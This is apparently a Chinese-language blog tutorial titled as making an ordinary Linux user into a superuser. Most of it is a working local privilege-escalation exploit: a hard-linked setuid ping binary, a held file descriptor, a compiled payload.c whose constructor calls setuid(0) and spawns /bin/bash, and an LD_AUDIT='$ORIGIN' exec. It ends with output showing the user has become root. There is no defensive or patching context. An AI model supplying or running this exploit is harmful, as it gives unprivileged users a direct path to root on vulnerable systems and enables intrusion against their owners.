Linux中普通用戶提權爲超級用戶

首先建立一個普通用戶，而且給普通用戶設置一個密碼，保證能用su 命令能用普通用戶登陸

[root@ahu ~]# useradd test
[root@ahu ~]# passwd test
New password: 
Retype new password:
passwd: all authentication tokens updated successfully.

[root@ahu ~]# su - test
[test@ahu ~]$ whoami 
test                            //登錄到普通用戶，發現建立不了其餘用戶
[test@ahu ~]$ useradd aaa
-bash: /usr/sbin/useradd: Permission denied

進行身份變換
[test@ahu ~]$ mkdir /tmp/exploit
[test@ahu ~]$ ln /bin/ping /tmp/exploit/target
[test@ahu exploit]$  exec 3< /tmp/exploit/target
[test@ahu exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
[test@ahu exploit]$ rm -rf /tmp/exploit/
[test@ahu exploit]$ ls -l /proc/$$/fd/3
[test@ahu ~]$ vim payload.c 
void __attribute__((constructor)) init()     //在配置文件加入以下的內容
{
    setuid(0);
    system("/bin/bash");
}
~           
[test@ahu ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@ahu ~]$ ls -l /tmp/exploit
[test@ahu ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@ahu ~]# whoami 
root
發現身份變成了 root用戶。身份變換成功！